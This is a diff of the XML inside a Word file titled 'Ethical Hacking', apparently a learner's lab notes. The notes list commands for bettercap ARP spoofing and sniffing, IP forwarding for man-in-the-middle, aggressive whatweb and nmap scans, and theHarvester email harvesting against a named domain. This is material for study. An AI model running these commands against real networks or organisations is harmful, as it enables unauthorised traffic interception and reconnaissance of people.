+              <w:t xml:space="preserve"> true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>.targets</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5064,31 +6614,90 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;set net.sniff.local true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;arp.spoof on</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;net.sniff on</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Note: If you want to run previous – You need to create a sniff.cap</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;bettercap -iface eth0 -caplet sniff.cap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>net.sniff</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>.local</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>net.sniff</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Note: If you want to run previous – You need to create a </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sniff.cap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>iface</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> eth0 -caplet </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sniff.cap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -5126,19 +6735,37 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;cat /proc/sys/net/ipv4/ip_forward</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Note: If its enable packet forwarding 0 or 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
-            </w:r>
+              <w:t>&gt;cat /proc/sys/net/ipv4/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ip_forward</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Note: If </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>its</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> enable packet forwarding 0 or 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ip_forward</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p>
@@ -5146,7 +6773,15 @@
               <w:t>Note: To start</w:t>
             </w:r>
             <w:r>
-              <w:t>, It will pop a window</w:t>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>It</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> will pop a window</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5175,7 +6810,23 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Can code using scapy instead of python</w:t>
+              <w:t xml:space="preserve">Can code </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>using</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>scapy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> instead of python</w:t>
             </w:r>
           </w:p>
         </w:tc>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,7 +90,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -101,14 +100,7 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">open port 80, </w:t>
+              <w:t xml:space="preserve">(open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -236,19 +228,9 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ifconfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>sudo ifconfig</w:t>
+            </w:r>
           </w:p>
           <w:p/>
           <w:p/>
@@ -282,13 +264,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – current directory</w:t>
+            <w:r>
+              <w:t>pwd – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -323,14 +300,12 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -428,13 +403,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Virtual Machine </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Virtual Machine msfadmin</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -526,15 +496,7 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">– to move </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>file{</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>mv file3.py FOLDERNAME}</w:t>
+              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -551,21 +513,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – ROOT USER</w:t>
+            <w:r>
+              <w:t>sudo su – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -738,19 +687,11 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>)</w:t>
+              <w:t>Ping()</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -767,19 +708,11 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> erertech.com</w:t>
+              <w:t>Nglookup erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -790,7 +723,6 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -803,7 +735,6 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -834,13 +765,8 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> erertech.com -v</w:t>
+            <w:r>
+              <w:t>Whatweb erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -875,7 +801,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -888,7 +813,6 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -908,7 +832,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -919,97 +842,259 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>hatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve">hatweb </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>erertech.com</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>whatweb 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>.168.1.4-192.168.1.255</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>erertech.com</w:t>
+              <w:t>–no</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -v</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>error</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 192</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>.168.1.4-192.168.1.255</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t xml:space="preserve">Tool: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve">Getting email using </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>the Harvester &amp; hunger.io</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>–no</w:t>
+              <w:t>-</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>-</w:t>
+              <w:t>theHarvester</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>error</w:t>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-b all</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>OR</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-hunter.io</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0DF"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> find email</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Redhawk(</w:t>
+            </w:r>
+            <w:r>
+              <w:t>software tools</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1017,224 +1102,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Tool: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Getting email using </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>the Harvester &amp; hunger.io</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>help</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -d erertech.com </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-b all</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>OR</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-hunter.io</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:sym w:font="Wingdings" w:char="F0DF"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> find email</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>Redhawk(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>software tools</w:t>
-            </w:r>
-            <w:r>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
             <w:r>
               <w:t>Sherlock -&gt; python3 sherlock.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt install python-pip</w:t>
+            <w:r>
+              <w:t>Sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1493,31 +1373,13 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>netdiscover</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo netdiscover</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1600,91 +1462,7 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sC</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>oN</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>folderName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>} {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>TargetIPAddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t>&gt;nmap -sC -sV -oN {folderName} {TargetIPAddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1695,7 +1473,6 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1703,11 +1480,7 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>Checking PORTS)</w:t>
+              <w:t>(Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1724,15 +1497,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>have to</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> put </w:t>
+              <w:t xml:space="preserve">You have to put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1859,17 +1624,63 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -</w:t>
